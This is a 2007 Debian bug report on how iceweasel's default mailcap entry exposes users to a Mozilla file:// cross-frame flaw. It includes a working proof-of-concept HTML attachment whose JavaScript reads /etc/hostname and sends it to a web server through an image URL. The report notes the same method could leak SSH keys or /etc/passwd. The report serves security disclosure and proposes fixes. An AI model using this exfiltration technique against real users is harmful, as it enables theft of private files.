Bug#429052: iceweasel: mailcap entry makes user more vulnerable to Mozilla bug 230606

Fri, 15 Jun 2007 09:04:17 -0700 

Package: iceweasel
Version: 2.0.0.4-1
Severity: grave
Tags: security
Justification: user security hole

The default /etc/mailcap entry makes iceweasel to be called directly
to view HTML files with a "file://" URL. Due to Mozilla bug 230606
(or 382637, on which the attached example is based), data readable
by the user can be sent to a remote web server.

For instance, on my machine, after saving the attached mail file and
removing my personal ~/.mailcap file (to use Debian's):

$ mutt -f exploit-file

I type 'v', down, enter to view the attached exploit-file.html file
with Iceweasel. /var/log/apache2/error.log now contains:

[Fri Jun 15 17:45:11 2007] [error] [client 127.0.0.1] File does not exist: 
/var/www/vin

This example just provides the hostname (value of /etc/hostname) to
the local web server, but one can provide more private information
(such as the contents of the user's .ssh/id_rsa or the contents of
/etc/passwd) to any remote web server (this needs a bit more JavaScript
to transform the data into a URL, though).

A possible fix is to pass the data first to a wrapper that will clean
up the HTML file (i.e. remove scripts), or, if one wants to still have
the possibility to run scripts, store the file to some place where a
"http://localhost/..."; URL can be used (the user must have a local web
server installed).

-- System Information:
Debian Release: lenny/sid
  APT prefers unstable
  APT policy: (500, 'unstable'), (500, 'stable')
Architecture: i386 (i686)

Kernel: Linux 2.6.18-4-686-bigmem (SMP w/2 CPU cores)
Locale: LANG=POSIX, LC_CTYPE=en_US.ISO8859-1 (charmap=ISO-8859-1)
Shell: /bin/sh linked to /bin/bash

Versions of packages iceweasel depends on:
ii  debianutils             2.21             Miscellaneous utilities specific t
ii  fontconfig              2.4.2-1.2        generic font configuration library
ii  libatk1.0-0             1.18.0-2         The ATK accessibility toolkit
ii  libc6                   2.5-11           GNU C Library: Shared libraries
ii  libcairo2               1.4.6-1.1        The Cairo 2D vector graphics libra
ii  libfontconfig1          2.4.2-1.2        generic font configuration library
ii  libfreetype6            2.2.1-6          FreeType 2 font engine, shared lib
ii  libgcc1                 1:4.2-20070609-1 GCC support library
ii  libglib2.0-0            2.12.12-1        The GLib library of C routines
ii  libgtk2.0-0             2.10.13-1        The GTK+ graphical user interface 
ii  libhunspell-1.1-0       1.1.5-6          spell checker and morphological an
ii  libjpeg62               6b-13            The Independent JPEG Group's JPEG 
ii  libnspr4-0d             4.6.6-3          NetScape Portable Runtime Library
ii  libnss3-0d              3.11.5-3         Network Security Service libraries
ii  libpango1.0-0           1.16.4-1         Layout and rendering of internatio
ii  libpng12-0              1.2.15~beta5-2   PNG library - runtime
ii  libstdc++6              4.2-20070609-1   The GNU Standard C++ Library v3
ii  libx11-6                2:1.0.3-7        X11 client-side library
ii  libxft2                 2.1.12-2         FreeType-based font drawing librar
ii  libxinerama1            1:1.0.2-1        X11 Xinerama extension library
ii  libxp6                  1:1.0.0.xsf1-1   X Printing Extension (Xprint) clie
ii  libxrender1             1:0.9.2-1        X Rendering Extension client libra
ii  libxt6                  1:1.0.5-3        X11 toolkit intrinsics library
ii  psmisc                  22.5-1           Utilities that use the proc filesy
ii  zlib1g                  1:1.2.3-15       compression library - runtime

iceweasel recommends no packages.

-- no debconf information

>From [EMAIL PROTECTED] Fri Jun 15 17:32:46 2007
From: [EMAIL PROTECTED]
Subject: Exploit - see https://bugzilla.mozilla.org/show_bug.cgi?id=382637
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="9jxsPFA5p3P2qPhR"
Content-Disposition: inline
Content-Transfer-Encoding: 8bit


--9jxsPFA5p3P2qPhR
Content-Type: text/plain; charset=iso-8859-1
Content-Disposition: inline
Content-Transfer-Encoding: 8bit

Open the HTML attachment with Firefox and look at your
/var/log/apache2/error.log (or similar).

--9jxsPFA5p3P2qPhR
Content-Type: text/html; charset=us-ascii
Content-Disposition: attachment; filename="exploit-file.html"

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Frameset//EN"
  "http://www.w3.org/TR/xhtml1/DTD/xhtml1-frameset.dtd";>

<!-- Idea from <https://bugzilla.mozilla.org/show_bug.cgi?id=382637>.
     Open this HTML *locally* (file:// URL). -->

<html xmlns="http://www.w3.org/1999/xhtml"; lang="en" xml:lang="en">

<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
<title>Exploit</title>
<script type="text/javascript">
function fun() {
  var data = top.frames['name2'].document.body.textContent;
  var img = new Image();
  img.src = "http://localhost/"; + data;
}
</script>
</head>

<frameset onload="fun()">
  <frame src="http://localhost/"; name="name1"/>
  <frame src="file:///etc/hostname" name="name2"/>
</frameset>

</html>

--9jxsPFA5p3P2qPhR--

Reply via email to